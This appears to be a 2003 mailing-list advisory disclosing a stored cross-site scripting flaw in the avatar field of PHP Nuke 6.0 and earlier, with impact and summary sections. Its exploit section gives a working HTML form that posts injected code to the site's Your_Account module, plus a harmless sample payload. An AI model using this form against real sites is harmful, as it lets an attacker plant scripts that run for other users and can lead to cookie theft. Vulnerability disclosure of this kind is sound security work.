------------------------------------------- Affected Versions: PHP Nuke versionh 6.0 and below Unaffected version: PHP Nuke 6.5 Impact: ------------------------------------------- Allows any user to inject their own HTML or Java code instead of an avatar image. This can lead to very annoying forum posts, and the usual XSS tricks. Summary: ------------------------------------------- When users sign up, they are asked to select an avatar from a list of available avatars in the website's /images/forum/avatars folder. When PHP Nuke inserts the image name of the selected avatar into the database, it does not perform any tag or code checks. So therefore if a user gets the site's <form> code and changes the avatar <select> box into a text box, he can enter HTML or java code which will be entered into the database and displayed wherever the avatar is shown. This can lead to very annoying forum posts, and to the theft of users' cookies using XSS. Exploit: ------------------------------------------- After you register on the vulnerable PHP Nuke site, login, then on the "Your Account" page click "Your Info", view source, then search for "uid", you should find something like this.. <input type="hidden" name="uid" value="2273"> The number you see for value, is your user id. After you got your user id, Launch this html code.. (make sure u change http://NUKESITE to the url of the vulnerable site) <!-- START CODE --!> <form name="Register" action="http://NUKEDSITE/modules.php?name=Your_Account" method="post"> <b>Code ('">[code]<b ')</b><input type="text" name="user_avatar" size="30" maxlength="30"><br><br> <b>Username</b><input type="text" name="uname" size="30" maxlength="255"><br><b>User ID:<input type="text" name="uid" size="30"><input type="hidden" name="op" value="saveuser"><input type="submit" value="Save Changes"></form> <!-- END CODE --!> When you launch it, type in your code, which must start with `">`. it doesnt matter how it ends, you can put a '<b ' at the end, so you dont get any broken code. Type in your username and user ID, then click submit, and u will be taken to the "Your Account" page on the vulnerable Nuked site. At this point you should be able to see the result of your code. Now anywhere that your avatar will be used, it will execute the code. ;) BTW the code you put in can only be 30 characters long due to the field's specified length in the database. heres a sample of what u can enter.. "><h1>TESTING</h1><b That will cause "TESTING" to appear in big letters wherever your avatar is used. There is a space after "<b" so make sure to put that in, or u will get ugly broken code. ;) Solution: ------------------------------------------- None as of yet.. If someone can please post a good solution it would be appreciated. ------------------------------------------- Another Vulnerability Brought to you by, delusion http://www.digital-delusions.com
This archive was generated by hypermail 2b30 : Mon Feb 03 2003 - 10:26:15 PST